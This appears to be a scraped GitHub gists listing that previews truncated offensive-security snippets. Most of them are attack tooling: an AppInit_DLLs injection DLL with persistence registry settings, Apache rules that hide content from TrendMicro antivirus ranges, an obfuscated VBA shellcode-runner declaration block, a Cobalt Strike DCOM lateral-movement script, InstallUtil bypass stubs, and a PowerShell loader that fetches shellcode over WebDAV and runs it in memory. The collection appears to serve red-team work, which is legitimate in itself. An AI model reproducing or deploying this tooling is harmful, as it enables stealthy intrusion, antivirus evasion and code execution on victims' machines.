This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll | |
// | |
// This DLL can only be injected in a x64 process | |
// | |
// Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll) | |
// by using the AppInit_DLLs capability: | |
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma separated if required) | |
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs = 1 (to enable this mecanism) | |
#include <windows.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# TrendMicro | |
RewriteCond expr "-R '150.70.0.0/22'" [OR] | |
RewriteCond expr "-R '150.70.104.0/22'" [OR] | |
RewriteCond expr "-R '150.70.110.0/24'" [OR] | |
RewriteCond expr "-R '150.70.112.0/20'" [OR] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aa.com | |
abcdin.cl | |
abi.ib | |
a.ccdn.es | |
activisionblizzard.com | |
adlibris.com | |
admin.bigbasket.com | |
admin.brightcove.co.jp | |
admin.brightcove.com | |
admin.charmingshoppes.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from stix2 import FileSystemSource | |
from stix2 import Filter | |
from stix2.utils import get_type_from_id | |
fs = FileSystemSource('./enterprise-attack') | |
def get_group_by_alias(src): | |
return src.query([ | |
Filter('type', '=', 'intrusion-set'), | |
]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#If VBA7 Then | |
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr | |
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr | |
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr | |
#Else | |
Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long | |
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long | |
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long | |
#End If |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
# Beacon implementation based on comexec.cna by Raphael Mudge | |
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
# Register alias | |
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
"Usage: dcom_shellexecute [target] [listener]\n\n" . | |
"Spawn new Beacon on a target via DCOM ShellExecute Object."); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
//Add For PowerShell Invocation | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-WebDavDelivery | |
{ | |
<# | |
.SYNOPSIS | |
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it. | |
This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data. | |
Function: Invoke-WebDavDelivery | |
Author: Arno0x0x, Twitter: @Arno0x0x |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Creates a basic Windows Service using .Net framework. | |
Compile: | |
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs | |
Create the service with name "Service": | |
sc create Service type=own binpath= c:\Path\To\service.exe | |
Start the service: |
NewerOlder